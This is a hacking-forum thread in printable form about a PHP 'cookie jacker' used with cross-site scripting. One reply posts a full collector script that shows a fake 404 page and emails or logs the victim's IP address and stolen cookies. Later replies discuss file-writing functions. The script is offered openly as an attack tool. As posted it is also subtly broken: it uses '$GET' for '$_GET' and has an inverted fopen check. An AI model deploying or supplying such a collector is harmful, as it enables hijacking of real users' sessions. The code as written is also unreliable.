![]() |
|
Cookie Jacker - Written in PHP [XSS] - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Coding (https://sinister.li/Forum-Coding) +--- Forum: PHP (https://sinister.li/Forum-PHP) +--- Thread: Cookie Jacker - Written in PHP [XSS] (/Thread-Cookie-Jacker-Written-in-PHP-XSS) Pages:
1
2
|
RE: Cookie Jacker - Written in PHP [XSS] - 0xDEAD10CC - 04-13-2014 You also forgot semicolons: PHP Code: fwrite($oven,$message)
fclose($oven)
I would've written it something like: PHP Code: <?php
/* configuration */
$show_alert = FALSE; // show alert, otherwise faked 404 page
$email_addr = 'youremail@domain.com'; // email to send data to
$logfile = 'log.txt'; // logfile filepath
$send_email = TRUE; // send email, otherwise write to logfile
/* page display */
$alert = "<script>alert('All your cookies are mine.')</script>";
$fake_page = "<html><head><h1>404 File Not Found</h1></head></html>";
echo $show_alert ? $alert : $fake_page;
/* message to write to log file or send in email */
$msg = "IP Address: {$_SERVER['REMOTE_ADDR']}\nCookies: {$GET['REQUEST']}";
if ($send_email) {
mail($email_addr, 'Cookies', $msg);
} else {
if (($f_handle = fopen($logfile, 'a')) !== FALSE) exit();
fwrite($f_handle, $msg);
fclose($f_handle);
}
?>RE: Cookie Jacker - Written in PHP [XSS] - Reiko - 04-13-2014 PHP Code: @file_put_contents($your, $dumb, FILE_APPEND);
RE: Cookie Jacker - Written in PHP [XSS] - 0xDEAD10CC - 04-14-2014 (04-13-2014, 08:15 PM)Starfall Wrote: http://web.archive.org/web/20100109103851/http://balancedbraces.com/2008/06/12/fopen-fwrite-fclose-vs-file_put_contents/ Small, but worth the mention. The overhead of the function call being that file_put_contents() is a wrapper for those 3 methods would be the only significant part here, but if you're making successive calls to file_put_contents(), then perhaps you do not want to be using that function... In this particular case though, the difference is minimal. |